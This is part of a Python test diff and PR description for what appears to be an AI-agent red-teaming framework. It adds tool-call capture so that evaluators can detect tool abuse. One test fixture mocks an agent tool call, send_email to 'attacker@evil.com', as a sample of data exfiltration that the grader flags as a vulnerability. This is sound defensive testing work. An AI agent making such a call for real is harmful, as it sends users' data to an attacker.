+            captured_prompt.append(kwargs["messages"][1]["content"])
+            return mock_response
+
+        mock_client = MagicMock()
+        mock_client.chat.completions.create = fake_create
+        evaluator.client = mock_client
+
+        mock_evaluator = MagicMock()
+        mock_evaluator.prompt = "Tools: {{output.tool_calls}} Response: {{output.response}}"
+
+        with patch("evaluatorq.redteam.adaptive.evaluator.with_llm_span") as mock_span:
+            mock_span.return_value.__aenter__ = AsyncMock(return_value=MagicMock())
+            mock_span.return_value.__aexit__ = AsyncMock(return_value=False)
+            await evaluator._run_evaluator(
+                evaluator=mock_evaluator,
+                evaluator_id="test",
+                messages=[],
+                response="agent said this",
+                span_attributes={},
+                tool_calls=[],
+            )
+
+        rendered = captured_prompt[0]
+        assert "[]" in rendered  # empty tool calls renders as []
+        assert "agent said this" in rendered
+
+    @pytest.mark.asyncio
+    async def test_tool_calls_with_result_none_renders_null(self) -> None:
+        from evaluatorq.redteam.adaptive.evaluator import OWASPEvaluator
+        evaluator = OWASPEvaluator.__new__(OWASPEvaluator)
+        evaluator.evaluator_model = "test-model"
+        evaluator.llm_kwargs = {}
+
+        captured_prompt: list[str] = []
+
+        mock_response = MagicMock()
+        mock_response.choices[0].message.content = '{"value": false, "explanation": "vuln"}'
+        mock_response.usage = None
+
+        async def fake_create(**kwargs):
+            captured_prompt.append(kwargs["messages"][1]["content"])
+            return mock_response
+
+        mock_client = MagicMock()
+        mock_client.chat.completions.create = fake_create
+        evaluator.client = mock_client
+
+        mock_evaluator = MagicMock()
+        mock_evaluator.prompt = "{{output.tool_calls}}"
+
+        tc = ExecutedToolCall(name="send_email", arguments={"to": "attacker@evil.com"}, result=None)
+
+        with patch("evaluatorq.redteam.adaptive.evaluator.with_llm_span") as mock_span:
+            mock_span.return_value.__aenter__ = AsyncMock(return_value=MagicMock())
+            mock_span.return_value.__aexit__ = AsyncMock(return_value=False)
+            await evaluator._run_evaluator(
+                evaluator=mock_evaluator,
+                evaluator_id="test",
+                messages=[],
+                response="",
+                span_attributes={},
+                tool_calls=[tc],
+            )
+
+        rendered = captured_prompt[0]
+        parsed = json.loads(rendered)
+        assert parsed[0]["name"] == "send_email"
+        assert parsed[0]["result"] is None
+        assert parsed[0]["arguments"]["to"] == "attacker@evil.com"
+
+
+# ---------------------------------------------------------------------------
+# LangGraph tool call extraction
+# ---------------------------------------------------------------------------
+
+class TestLangGraphToolCallExtraction:
+    @pytest.mark.asyncio
+    async def test_extracts_tool_calls_from_ai_messages(self) -> None:
+        pytest.importorskip("langgraph")
+        from evaluatorq.integrations.langgraph_integration import LangGraphTarget
+
+        ai_msg = MagicMock()
+        ai_msg.content = "I'll search for that"
+        ai_msg.tool_calls = [{"name": "web_search", "args": {"query": "hello"}}]
+
+        final_msg = MagicMock()
+        final_msg.content = "Here is the result"
+        final_msg.tool_calls = []
+
+        graph = MagicMock()
+        graph.ainvoke = AsyncMock(return_value={"messages": [ai_msg, final_msg]})
+
+        target = LangGraphTarget(graph)
+        result = await target.send_prompt("search for something")
+
+        assert result.text == "Here is the result"
+        assert len(result.tool_calls) == 1
+        assert result.tool_calls[0].name == "web_search"
+        assert result.tool_calls[0].arguments == {"query": "hello"}
+
+    @pytest.mark.asyncio
+    async def test_no_tool_calls_returns_empty_list(self) -> None:
+        pytest.importorskip("langgraph")
+        from evaluatorq.integrations.langgraph_integration import LangGraphTarget
+
+        msg = MagicMock()
+        msg.content = "plain response"
+        msg.tool_calls = []
+
+        graph = MagicMock()
+        graph.ainvoke = AsyncMock(return_value={"messages": [msg]})
+
+        target = LangGraphTarget(graph)
+        result = await target.send_prompt("hi")
+        assert result.tool_calls == []
+
+    @pytest.mark.asyncio
+    async def test_extracts_tool_calls_from_dict_messages(self) -> None:
+        pytest.importorskip("langgraph")
+        from evaluatorq.integrations.langgraph_integration import LangGraphTarget
+
+        graph = MagicMock()
+        graph.ainvoke = AsyncMock(return_value={"messages": [
+            {"role": "assistant", "content": "calling tool", "tool_calls": [
+                {"name": "get_weather", "args": {"city": "Amsterdam"}}
+            ]},
+            {"role": "assistant", "content": "done", "tool_calls": []},
+        ]})
+
+        target = LangGraphTarget(graph)
+        result = await target.send_prompt("weather?")
+        assert len(result.tool_calls) == 1
+        assert result.tool_calls[0].name == "get_weather"
+
+
+# ---------------------------------------------------------------------------
+# OpenAI Agents tool call extraction (current turn only)
+# ---------------------------------------------------------------------------
+
+class TestOpenAIAgentsToolCallExtraction:
+    @pytest.mark.asyncio
+    async def test_extracts_tool_calls_from_current_turn_only(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        pytest.importorskip("agents")
+        from evaluatorq.integrations.openai_agents_integration import OpenAIAgentTarget
+
+        turn1_history = [
+            {"role": "user", "content": "first"},
+            {"role": "assistant", "content": None, "tool_calls": [
+                {"function": {"name": "tool_a", "arguments": '{"x": 1}'}, "type": "function", "id": "1"}
+            ]},
+            {"role": "assistant", "content": "done first"},
+        ]
+        turn2_history = [
+            *turn1_history,
+            {"role": "user", "content": "second"},
+            {"role": "assistant", "content": None, "tool_calls": [
+                {"function": {"name": "tool_b", "arguments": '{"y": 2}'}, "type": "function", "id": "2"}
+            ]},
+            {"role": "assistant", "content": "done second"},
+        ]
+
+        call_count = 0
+
+        async def fake_run(agent, input_data, **kwargs):
+            nonlocal call_count
+            call_count += 1
+            result = MagicMock()
+            result.final_output = f"reply {call_count}"
+            result.to_input_list.return_value = turn1_history if call_count == 1 else turn2_history
+            return result
+
+        runner = MagicMock()
+        runner.run = fake_run
+        monkeypatch.setattr("evaluatorq.integrations.openai_agents_integration.target.Runner", runner)
+
+        target = OpenAIAgentTarget(MagicMock())
+        r1 = await target.send_prompt("first")
+        # Turn 1: tool_a only
+        assert len(r1.tool_calls) == 1
+        assert r1.tool_calls[0].name == "tool_a"
+
+        r2 = await target.send_prompt("second")
+        # Turn 2: tool_b only (not tool_a again)
+        assert len(r2.tool_calls) == 1
+        assert r2.tool_calls[0].name == "tool_b"
+
+    @pytest.mark.asyncio
+    async def test_malformed_arguments_json_falls_back_to_raw(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        pytest.importorskip("agents")
+        from evaluatorq.integrations.openai_agents_integration import OpenAIAgentTarget
+
+        history = [
+            {"role": "assistant", "content": None, "tool_calls": [
+                {"function": {"name": "bad_tool", "arguments": "not-valid-json"}, "type": "function", "id": "1"}
+            ]},
+        ]
+
+        async def fake_run(agent, input_data, **kwargs):
+            result = MagicMock()
+            result.final_output = "ok"
+            result.to_input_list.return_value = history
+            return result
+
+        runner = MagicMock()
+        runner.run = fake_run
+        monkeypatch.setattr("evaluatorq.integrations.openai_agents_integration.target.Runner", runner)
+
+        target = OpenAIAgentTarget(MagicMock())
+        result = await target.send_prompt("hi")
+        assert result.tool_calls[0].arguments == {"raw": "not-valid-json"}


### PR DESCRIPTION
## Summary

Evolves `AgentTarget.send_prompt(str) -> str` to `send_prompt(str) -> AgentResponse`, enabling tool call capture across all agent integrations.

- `ExecutedToolCall` and `AgentResponse` dataclasses added to `contracts.py`
- `AgentTarget` protocol updated; backward-compat str returns auto-wrapped via `_coerce_to_agent_response` at every call site (orchestrator, pipeline, runner)
- `tool_calls_per_turn: list[list[ExecutedToolCall]]` added to `OrchestratorResult`
- `{{output.tool_calls}}` template variable added to evaluator prompt pipeline with placeholder sanitization to prevent cross-expansion attacks
- `ExecutedToolCall` / `AgentResponse` exported from public `evaluatorq.redteam` namespace

## Integrations updated

| Target | Tool call source |
|--------|-----------------|
| `OpenAIModelTarget` | `response.choices[0].message.tool_calls` |
| `ORQAgentTarget` | `pending_tool_calls` across all continuation iterations |
| `LangGraphTarget` | All AI messages in `state["messages"]` |
| `OpenAIAgentTarget` | `result.to_input_list()` — current turn only (not full history) |
| `CallableTarget`, `VercelAISdkTarget` | Transparent via backward-compat str wrap |

## Scope checklist

- [x] Define `AgentResponse` and `ExecutedToolCall` data models
- [x] Update `AgentTarget` protocol: `send_prompt(str) -> AgentResponse`
- [x] Backward-compat: keep accepting `str` returns, auto-wrap to `AgentResponse(text=...)`
- [x] Update LangGraph integration to capture tool calls from intermediate messages
- [x] Update OpenAI Agents integration to capture tool calls from `result.to_input_list()`
- [x] Update evaluators to optionally inspect `tool_calls` for tool-abuse vulnerabilities (ASI05, ASI06)
- [x] Update reporting to show tool call details (`tool_calls_per_turn` in `OrchestratorResult`)

## Tests

21 new tests covering: `_coerce_to_agent_response` (str/AgentResponse/None), `ExecutedToolCall` construction, `OrchestratorResult.tool_calls_per_turn`, `_sanitize_placeholders`, evaluator `{{output.tool_calls}}` substitution, LangGraph tool call extraction, OpenAI Agents per-turn isolation (no history duplication).

708 tests passing.